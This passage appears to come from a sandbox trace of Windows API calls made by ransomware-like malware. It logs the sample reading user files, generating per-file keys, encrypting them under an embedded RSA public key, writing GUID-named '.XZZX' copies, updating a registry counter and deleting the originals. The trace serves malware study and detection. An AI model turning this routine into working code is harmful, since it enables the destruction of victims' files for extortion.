lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0048.340] SetFilePointer (in: hFile=0x588, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0048.340] WriteFile (in: hFile=0x588, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x2a, lpOverlapped=0x0) returned 1 [0048.340] SetFilePointer (in: hFile=0x588, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb4 [0048.340] WriteFile (in: hFile=0x588, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0048.340] SetFilePointer (in: hFile=0x588, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb9 [0048.340] SetErrorMode (uMode=0x1) returned 0x1 [0048.340] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0048.340] OutputDebugStringW (lpOutputString="end") [0048.340] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0048.340] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0048.340] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e42760) returned 1 [0048.341] CryptImportPublicKeyInfo (in: hCryptProv=0x3e42760, dwCertEncodingType=0x1, pInfo=0x42e06d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e0700*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e0708*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e27fb8) returned 1 [0048.341] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0048.342] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0048.342] CryptEncrypt (in: hKey=0x3e27fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0048.342] CryptEncrypt (in: hKey=0x3e27fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e427e8*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e427e8*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0048.342] WriteFile (in: hFile=0x588, lpBuffer=0x3e427e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e427e8*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0048.342] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0048.342] WriteFile (in: hFile=0x588, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0048.342] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0048.342] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0048.342] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x5b0) returned 0x0 [0048.342] RegQueryValueExW (in: hKey=0x5b0, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x4e, lpcbData=0x417dfdc*=0x4) returned 0x0 [0048.342] RegCloseKey (hKey=0x5b0) returned 0x0 [0048.342] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x5b0) returned 0x0 [0048.342] RegSetValueExW (in: hKey=0x5b0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x4f, cbData=0x4 | out: lpData=0x417dfec*=0x4f) returned 0x0 [0048.343] RegCloseKey (hKey=0x5b0) returned 0x0 [0048.343] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0048.343] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0048.343] CloseHandle (hObject=0x588) returned 1 [0048.344] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0048.344] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0048.344] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url")) returned 1 [0048.345] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url")) returned 0 Thread: id = 174 os_tid = 0xa40 [0048.264] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0048.264] lstrcpyW (in: lpString1=0x42cf460, lpString2="Windows Live Spaces.url" | out: lpString1="Windows Live Spaces.url") returned="Windows Live Spaces.url" [0048.265] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0048.265] SetErrorMode (uMode=0x1) returned 0x1 [0048.265] lstrcpyW (in: lpString1=0x42cf860, lpString2="Windows Live Spaces.url" | out: lpString1="Windows Live Spaces.url") returned="Windows Live Spaces.url" [0048.265] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0xcf379f2b, Data2=0x5c70, Data3=0x40cb, Data4=([0]=0xbd, [1]=0x6c, [2]=0x22, [3]=0x6a, [4]=0x6f, [5]=0x94, [6]=0x6c, [7]=0xa3))) returned 0x0 [0048.265] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0048.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0048.265] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\A58916D017654CD0CF379F2B1B923118.XZZX") returned 94 [0048.265] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="XZZX") returned 0x0 [0048.265] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url", dwFileAttributes=0x20) returned 1 [0048.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0048.267] ReadFile (in: hFile=0x588, lpBuffer=0x34e0f8, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x34e0f8*, lpNumberOfBytesRead=0x42ce418*=0x85, lpOverlapped=0x0) returned 1 [0048.268] CloseHandle (hObject=0x588) returned 1 [0048.268] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3ef0000 [0048.269] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3f00000 [0048.270] SetErrorMode (uMode=0x1) returned 0x1 [0048.270] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0048.270] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e426d8) returned 1 [0048.273] CryptGenKey (in: hProv=0x3e426d8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e28038) returned 1 [0049.065] CryptExportKey (in: hKey=0x3e28038, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0049.065] CryptExportKey (in: hKey=0x3e28038, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3f00000, pdwDataLen=0x42ce41c | out: pbData=0x3f00000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0049.065] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0049.065] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0049.065] CryptDestroyKey (hKey=0x3e28038) returned 1 [0049.065] CryptReleaseContext (hProv=0x3e428f8, dwFlags=0x0) returned 0 [0049.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\A58916D017654CD0CF379F2B1B923118.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\a58916d017654cd0cf379f2b1b923118.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c0 [0049.066] WriteFile (in: hFile=0x5c0, lpBuffer=0x34e0f8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x34e0f8*, lpNumberOfBytesWritten=0x42ce438*=0x85, lpOverlapped=0x0) returned 1 [0049.066] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0049.066] WriteFile (in: hFile=0x5c0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0049.067] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0049.067] WriteFile (in: hFile=0x5c0, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x2e, lpOverlapped=0x0) returned 1 [0049.067] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb8 [0049.067] WriteFile (in: hFile=0x5c0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0049.067] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbd [0049.067] SetErrorMode (uMode=0x1) returned 0x1 [0049.067] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0049.067] OutputDebugStringW (lpOutputString="end") [0049.067] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wàVâ\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0049.067] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0049.067] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3e42980) returned 1 [0049.068] CryptImportPublicKeyInfo (in: hCryptProv=0x3e42980, dwCertEncodingType=0x1, pInfo=0x42e0870*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e08a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e08a8*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x3e28038) returned 1 [0049.068] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0049.069] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0049.069] CryptEncrypt (in: hKey=0x3e28038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0049.069] CryptEncrypt (in: hKey=0x3e28038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e42a08*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e42a08*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0049.069] WriteFile (in: hFile=0x5c0, lpBuffer=0x3e42a08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e42a08*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0049.069] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0049.069] WriteFile (in: hFile=0x5c0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0049.069] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0049.069] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0049.069] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x5cc) returned 0x0 [0049.069] RegQueryValueExW (in: hKey=0x5cc, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x4f, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0049.069] RegCloseKey (hKey=0x5cc) returned 0x0 [0049.069] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x5cc) returned 0x0 [0049.069] RegSetValueExW (in: hKey=0x5cc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x50, cbData=0x4 | out: lpData=0x42cdfec*=0x50) returned 0x0 [0049.069] RegCloseKey (hKey=0x5cc) returned 0x0 [0049.069] VirtualFree (lpAddress=0x3ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.070] VirtualFree (lpAddress=0x3f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.070] CloseHandle (hObject=0x5c0) returned 1 [0049.071] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0049.071] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0049.071] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url")) returned 1 [0049.071] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url")) returned 0 Thread: id = 175 os_tid = 0xa74 [0048.704] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0048.704] lstrcpyW (in: lpString1=0x417f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0048.704] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0048.704] SetErrorMode (uMode=0x1) returned 0x1 [0048.704] lstrcpyW (in: lpString1=0x417f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0048.704] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xa7e7aa8d, Data2=0xeac0, Data3=0x4d87, Data4=([0]=0x8e, [1]=0x58, [2]=0xe0, [3]=0xc6, [4]=0x6, [5]=0xa6, [6]=0x24, [7]=0x45))) returned 0x0 [0048.704] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 51 [0048.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0048.704] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX") returned 77 [0048.704] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0048.704] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini", dwFileAttributes=0x20) returned 1 [0048.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b0 [0048.704] ReadFile (in: hFile=0x5b0, lpBuffer=0x3e29168, nNumberOfBytesToRead=0x244, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x3e29168*, lpNumberOfBytesRead=0x417e418*=0x244, lpOverlapped=0x0) returned 1 [0048.705] CloseHandle (hObject=0x5b0) returned 1 [0048.705] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0048.706] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0048.706] SetErrorMode (uMode=0x1) returned 0x1 [0048.706] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0048.706] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e42870) returned 1 [0048.709] CryptGenKey (in: hProv=0x3e42870, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e27df8) returned 1 [0049.551] CryptExportKey (in: hKey=0x3e27df8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0049.551] CryptExportKey (in: hKey=0x3e27df8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0049.551] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0049.551] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0049.551] CryptDestroyKey (hKey=0x3e27df8) returned 1 [0049.551] CryptReleaseContext (hProv=0x3e42b18, dwFlags=0x0) returned 0 [0049.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\afa4cbc047178b40a7e7aa8d4b2f6f88.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e8 [0049.552] WriteFile (in: hFile=0x5e8, lpBuffer=0x3e29168*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e29168*, lpNumberOfBytesWritten=0x417e438*=0x244, lpOverlapped=0x0) returned 1 [0049.552] SetFilePointer (in: hFile=0x5e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x244 [0049.552] WriteFile 